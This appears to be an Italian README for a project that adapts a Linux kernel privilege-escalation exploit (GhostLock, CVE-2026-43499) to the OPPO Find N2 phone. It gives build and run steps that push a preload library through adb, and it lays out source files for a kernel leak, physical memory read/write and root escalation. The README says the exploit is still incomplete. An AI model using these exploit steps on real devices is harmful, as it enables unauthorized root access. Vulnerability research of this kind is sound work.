
Adattamento dell'exploit per OPPO Find N2 GhostLock (CVE-2026-43499)
GhostLock CVE-2026-43499 — Ricerca sull'escalation dei privilegi nel kernel Linux di OPPO Find N2
GhostLock (CVE-2026-43499) è una vulnerabilità UAF dello stack del kernel che interessa Linux dalla versione 2.6.39 alla 7.1-rc1, innescata tramite una race condition su FUTEX_CMP_REQUEUE_PI. Questo progetto adatta l'exploit x86_64 di NebuSec/CyberMeowfia a OPPO Find N2 (ARM64, kernel 5.10.236).
In iterazione — Diverse fasi dell'exploit sono state verificate con successo, ma il punto di blocco principale (bypass CFI / primitiva di scrittura nel kernel) non è stato ancora superato.
FUTEX_CMP_REQUEUE_PI ret=0# 1. Clona il repository
git clone https://github.com/pubglite55/oppo-ghostlock.git
cd oppo-ghostlock
# 2. Imposta il percorso NDK
export NDK=/usr/local/Caskroom/android-ndk/29/AndroidNDK14206865.app/Contents/NDK
# 3. Compila l'exploit
cd exploit/
make clean && make NDK=$NDK
# 4. Invia al dispositivo
adb push preload.so /data/local/tmp/
# 5. Esegui
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/ls /dev/null' 2>&1
oppo-ghostlock/
├── exploit/
│ ├── src/
│ │ ├── main.c # punto di ingresso principale, trigger GhostLock
│ │ ├── fops.c # pselect fake lock + leak della base del kernel
│ │ ├── pipe.c # lettura/scrittura fisica tramite pipe
│ │ ├── root.c # escalation a root
│ │ ├── util.c # funzioni di utilità
│ │ └── kernelsnitch/ # leak di mm_struct
│ ├── targets/ # definizioni degli offset del dispositivo
│ └── Makefile
└── README.md
Questo progetto è distribuito con licenza MIT.